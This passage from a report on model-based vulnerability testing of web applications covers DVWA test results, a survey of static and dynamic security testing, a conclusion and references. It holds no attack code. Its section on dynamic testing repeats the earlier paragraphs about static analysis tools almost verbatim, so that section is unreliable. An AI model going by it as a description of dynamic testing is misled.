Fig. XI Mapping between abstract and concrete values

Operations of the SUT can be adapted in two ways: using Selenium or HTTPClient. However, we mainly use the HTTP-based approach (HTTPClient), because this techniques dramatically saves time on DVWA, for the same results. Based on the execution of the test suite, 50% of the test cases have been identified as Attack-pass: the two first malicious data with a low security level, the third malicious datum with the low and medium security level, and the fourth malicious datum with the medium security level. These results fit our manual experiments on DVWA. This concordance gives a first validation of our approach with regards to the addressed subset of vulnerabilities, and the DVWA context.

6. STATE OF ARTThe tool landscape in web application security testing is structured in two main classes of techniques:

a. Static Application Security Testing (SAST), which are white-box approaches including source, byte and object code scanners and static analysis techniques;

b. Dynamic Application Security Testing (DAST), which includes black-box web applications scanners, fuzzing techniques and emerging model-based security testing approaches.

6.1 Static Application Security TestingStatic application security testing takes place during the implementation phase of a project and is a required practice in Microsoft’s Security Development Lifecycle. It is also one of the methods that can be used to mitigate security risks for applications that are required to comply with the Payment Card Industry Data Security Standard (PCI DSS). Static application security testing (SAST) can be thought of as testing the application from the inside out – by examining its source code, byte code or application binaries for conditions indicative of a security vulnerability.A thorough source code review has an advantage over dynamic testing. Nothing is hidden from analysts during a source code review, so they can examine exactly how data flows through a program. Specific attributes of the application, such as credit card numbers and personal data, can be taken into account, allowing the full range of security vulnerabilities to be identified. A source code review can help ensure secure coding policies are followed, and unsafe and prohibited functions aren’t being used, for example, looking at the way errors are handled and checking permissions on

19

Page 20: Model based vulnerability testing report

configuration files and network connections. By solving the problem at the code level, static testing reduces the number of security-related design and coding defects, and the severity of any defects that make it through to the release version, thus dramatically improving the overall security of the application. Automated tools greatly reduce the time it takes to review complex reams of code. Although static analysis tools can’t test adherence to security policy or identify backdoors in an application in the way a manual code review can, they can shorten the time it takes to review large complex applications.High-range tools use sophisticated functions such as data flow analysis, control flow analysis and pattern recognition to identify potential security vulnerabilities. I say potential because the results tend to include a high number of false positives. The advantage is they can analyze highly complex reams of code and identify issues a manual review should concentrate on. This can make them quite cost-effective.You do, however, need to be aware of the strengths and weaknesses of static analysis tools and be prepared to augment them with human reviews where appropriate. For example, automated tools tend to be weak on detecting errors that could occur due to poor flow control and badly implemented business logic. It's possible to use internal staff for your reviews as long as they have the necessary skills and experience, and aren’t the same employees who developed the application. However, having dedicated code reviewers is only economical for large enterprises that are constantly developing their own applications. The flip side to this is a well-built application dosen’t require the same level of ongoing care and maintenance as one that is repeatedly hacked into due to unidentified coding flaws.

6.2 Dynamic Application Security TestingDynamic application security testing (DAST) can be thought of as testing the application from the outside in – by examining the application in its running state and trying to poke it and prod it in unexpected ways in order to discover security vulnerabilities. Automated tools greatly reduce the time it takes to review complex reams of code. Although static analysis tools can’t test adherence to security policy or identify backdoors in an application in the way a manual code review can, they can shorten the time it takes to review large complex applications.High-range tools use sophisticated functions such as data flow analysis, control flow analysis and pattern recognition to identify potential security vulnerabilities. I say potential because the results tend to include a high number of false positives. The advantage is they can analyze highly complex reams of code and identify issues a manual review should concentrate on. This can make them quite cost-effective.You do, however, need to be aware of the strengths and weaknesses of static analysis tools and be prepared to augment them with human reviews where appropriate. For example, automated tools tend to be weak on detecting errors that could occur due to poor flow control and badly implemented business logic. It's possible to use internal staff for your reviews as long as they have the necessary skills and experience, and aren’t the same employees who developed the application. However, having dedicated code reviewers is only economical for large enterprises that are constantly developing their own applications. The flip side to this is a well-built application dosen’t require the same level of ongoing care and maintenance as one that is repeatedly hacked into due to unidentified coding flaws.

20

Page 21: Model based vulnerability testing report

These techniques are complementary, addressing different types of vulnerabilities. For example, SAST techniques are good to detect buffer overflow and other badly formatted string, but not so good to detect XSS or CSRF vulnerabilities. So, in this section, we focus on DAST techniques and provide a state of the art of emerging model-based security testing techniques.We believe that the ability to test an application both statically and dynamically will become increasingly important. Why? A couple of reasons:

a. Some vulnerabilities can be found only with SAST testing, others with DAST. Testing in both ways yields the most comprehensive testing.

b. Many web applications that would be traditionally scanned with DAST tools also use a significant amount of client-side code in the form of Javascript, Flash, Flex and Silverlight. This code must also be analyzed for security vulnerabilities, typically using static analysis.

There are other reasons, but the net/net is that testing application with only one form of testing tool leaves residual risk our most critical applications should be tested using both SAST and DAST techniques. The good news is that several vendors offer both forms of testing so the purchase of two separate tools/services isn’t required.Fuzzing techniques relate to the massive injection of invalid or atypical data (for example by randomly corrupting an XML file) generally by using a randomized approach. Test execution results can therefore expose various invalid behaviours such as crash effects, failing built-in code assertions or memory leaks.Web application vulnerability scanners aim to detect vulnerabilities by injecting attack vectors. These tools generally include three main components: a crawler module to follow web links and URLs in the web application in order to retrieve injection points, an injection module which analyses web pages, input points to inject attack vectors (such as code injection), and an analysis module to determine possible vulnerabilities based on the system response after attack vector injection. As shown in recent comprehensive studies and confirmed by our own experience with tools such as IBM AppScan, these tools suffer from two major weaknesses that highly decrease their practical usefulness:

a. Limitations in application discovery: As black-box web vulnerability scanners ignore any request that can change the state of the web application, they miss large parts of the application. Therefore, these tools test generally a small part of the web application due to the ignorance of the application behavioural “intelligence”. Due to the growing complexity of the web applications, they have trouble dealing with specific issues such as infinite web sites with random URL based session IDs or automated form submission.

b. Generation of many false positive results: The already-mentioned benchmark shows that a common drawback of these tools is the generation of false positives at a very important rate either for Reflected XSS, SQL injection or Remote File Inclusion vulnerabilities. The reason is that these tools use brute force mechanisms to fuzz the input data in order to trigger vulnerabilities and establish a verdict by comparison to a reference execution trace. Therefore, they lack precision to assign the verdict, as they do not compute the topology of the web application to precisely know where to observe.

21

Page 22: Model based vulnerability testing report

These strong limitations of existing web vulnerability scanners lead to the key objectives of model-based vulnerability testing techniques: better accuracy in vulnerability detection, both by better covering the application (by capturing the behavioural intelligence) and by increasing the precision of the verdict assignment.

In this way, Model-based security testing are emerging techniques aiming to leverage model based approaches for security testing. This includes:

a. Model-based test generation from security protocol, access-control or security-oriented models: Various types of models of security aspects of the system under test have been considered as input to generate security test. For example, proposes a method using security protocol mutation to infer security test cases. [2] Develops a model-based security test generation approach from security models in UMLSec. [3] Presents a methodology to exploit a model describing a Web application at the browser level to guide a penetration tester in finding attacks based on logical vulnerabilities.

b. Model-based fuzzing: This approach applies fuzzing operator in conjunction with models; For example, [4] proposes an approach that generates invalid message sequences instead of invalid input data by applying behavioural fuzzing operators to valid message sequences in form of UML sequence diagrams.

c. Model-based test generation from weakness or attack models: In these types of approaches, test cases are generated using threat, vulnerability or attacker models, which reflects the common steps needed to perform an attack, and the required associated data. For example, [5], threats to security policies are modelled with UML sequence diagrams, allowing to extract event sequences that should not occur during the system execution.

Complementary to these model-based techniques for security testing, our model-based vulnerability testing approach allows to generate vulnerability tests from a model that mixes functional behavioural features of the system under test and aspects that model the possible attacks, which is modelling aspects of the environment of the system. Moreover, contrary to functional MBT, the proposed MBVT process is driven by the vulnerability test patterns, so that the behavioural model is restricted to the only elements that are needed to compute the vulnerability test cases. The research goal of the MBVT approach, which is introduced in this paper, is thus to improve the accuracy and precision of vulnerability testing by means of models (inferred or manually designed) and test patterns. By accuracy of vulnerability testing, we mean the capability to focus vulnerability testing on the relevant part of the software (e.g. from a risk assessment point of view) depending on the targeted vulnerability types. By precision, we mean the capability to avoid both false positive and false negative.

7. CONCLUSIONWeb application vulnerabilities fall into two categories:

a. Technical vulnerabilities: include cross-site scripting, injection flaws and buffer overflows.

22

Page 23: Model based vulnerability testing report

b. Logical vulnerabilities: relate to the logic of the application to get it to do things it was never intended to do. They often are the result of faulty application logic. Logical vulnerabilities are specific to the functionality of particular web applications, and, thus, they are extremely difficult to characterize and identify. For example, an important security breach have been discovered and disclosed in 2012 in the PayPal payment module of Magento12 ecommerce framework, due to the capability to falsify the payment amount.This paper proposes a Model-Based Vulnerability Testing (MBVT) approach from a behavioural model and test patterns, which aims to address both technical and logicalvulnerabilities. Technical vulnerabilities are managed by the composition of a navigational behavioural model and related test patterns; and logical vulnerabilities may be addressed through more complete modelling and adequate patterns. The research goal is to improve the capability to focus vulnerability testing on the relevant part of the software (e.g., from a risk assessment point of view) and the capability to avoid both false positive and false negative. Where false positive error occurs when a condition is incorrectly fulfilled but actually it is rejected, and false negative error occurs when a condition is incorrectly rejected but actually it is successful.MBVT is renewing deeply the research questions around MBT. The target is now negative tests (simulating attacks from a malicious agent) and no more positive tests. Automated test generation is driven by ad-hoc Test Purposes capturing vulnerability test patterns. At this stage of our research, this has already strongly impacted the coretest generation engine of the MBT technology we are using (Smartesting CertifyIt), which initially was based on model coverage only.The main drawback of model-based vulnerability testing echoes the one of MBT in general: the needed effort to design models, test purposes, and adapter. We are following several research directions to reduce this effort, which consist in identifying the reusability potential of the three artefacts from one project to another: test purposes can be made generic to their affiliated vulnerability type, model parts can be made generic to a web development framework (like Magneto for e-commerce solutions) and also automatically generated, at least partially, using crawling techniques, and the adapter of those model parts can also be made generic to the associated framework.Therefore, future work leads in two main research directions:

i. Extending the method by covering more vulnerability classes, both technical (such as CSRF, file disclosure and file injection) and logical (such as the integrity of data over applications business processes).

ii. How the various MBVT artefacts may be made generic and reusable from one project to another project. In this context, we will focus on ecommerce applications, and more particularly ecommerce applications build on the topof the Magento framework. Indeed, ecommerce applications built with Magento have good properties because they rely to custom development and use of add-ons, both being wellknown to introduce security vulnerabilities.

Finally, this MBVT approach will be used as a basis to define and experiment risk-based security testing techniques for largescale networked systems within the European FP7 project RASEN.

23

Page 24: Model based vulnerability testing report

8. REFERENCES

[1] F. Bouquet, C. Grandpierre, B. Legeard, F. Peureux, N. Vacelet, and M. Utting, “A subset of precise UML for model-based testing,” in Proceedings of the 3rd Int. Workshop on Advances in Model Based Testing (A-MOST’07). London, UK: ACM Press, July 2007, pp. 95–104.

[2] J. J¨urjens, “Model-based Security Testing Using UMLsec: A Case Study,” The Journal of Electronic Notes in Theoretical Computer Science (ENTCS), vol. 220, no. 1, pp. 93–104, December 2008.

[3] M. Buchler, J. Oudinet, and A. Pretschner, “Semi-Automatic Security Testing of Web Applications from a Secure Model,” in Proc. of the 6th IEEE Int. Conf. on Software Security and Reliability (SERE’12). Gaithersburg, MD, USA: IEEE Computer Society, June 2012, pp. 253–262.

[4] M. Schneider, “Model-based behavioural fuzzing,” in Proceedings of the 9th International Workshop on Systems Testing and Validation (STV’12), Paris, France, October 2012, pp. 39–47.

[5] L. Wang, E. Wong, and D. Xu, “A threat model driven approach for security testing,” in Proceedings of the 3rd Int. Workshop on Software Engineering for Secure Systems (SESS’07). Minneapolis, MN, USA: IEEE Computer Society, May 2007.

24

Page 25: Model based vulnerability testing report

[6]http://www.infoq.com/articles/defending-against-web-application-vulnerabilities

[7]http://www.spacios.eu/sectest2013/pdfs/sectest2013_submission_8.pdf

[8]http://narainko.wordpress.com/2012/08/26/understanding-false-positive-and-false-negative

[9]http://istina.msu.ru/media/publications/articles/5db/2e2/2755271/OWASP-AppSecEU08-Petukhov.pdf

[10]http://searchsecurity.techtarget.com/answer/Software-testing-methodologies-Dynamic-versus-static-application-security-testing

[11]http://blogs.gartner.com/neil_macdonald/2011/01/19/static-or-dynamic- application-security-testing-both

[12] http://www.cisco.com/web/about/security/intelligence/sql_injection.html

[13] https://www.owasp.org/index.php/Blind_SQL_Injection

[14] J. Bau, E. Bursztein, D. Gupta, and J. Mitchell, “State of the Art:Automated Black-Box Web Application Vulnerability Testing,” in Proceedings of the 31th Int. Symposium on Security and Privacy (SP’10). Oakland, CA, USA: IEEE Computer Society, May 2010, pp. 332–345.

[15] M. Utting and B. Legeard, Practical Model-Based Testing - A tools approach, Morgan and Kaufmann, Eds. San Francisco, CA, USA: Elsevier Science, 2006.

[16] A. Dias-Neto and G. Travassos, “A Picture from the Model-Based Testing Area: Concepts, Techniques, and Challenges,” Advances in Computers, vol. 80, pp. 45–120, July 2010, iSSN: 0065-2458.

[17] E. Bernard, F. Bouquet, A. Charbonnier, B. Legeard, F. Peureux, M. Utting, and E. Torreborre, “Model-based testing from UML models,” in Proceedings of the Int. Workshop on Model-based Testing (MBT’2006), ser. LNCS, vol. 94. Dresden, Germany: Springer Verlag, October 2006, pp. 223–230.

25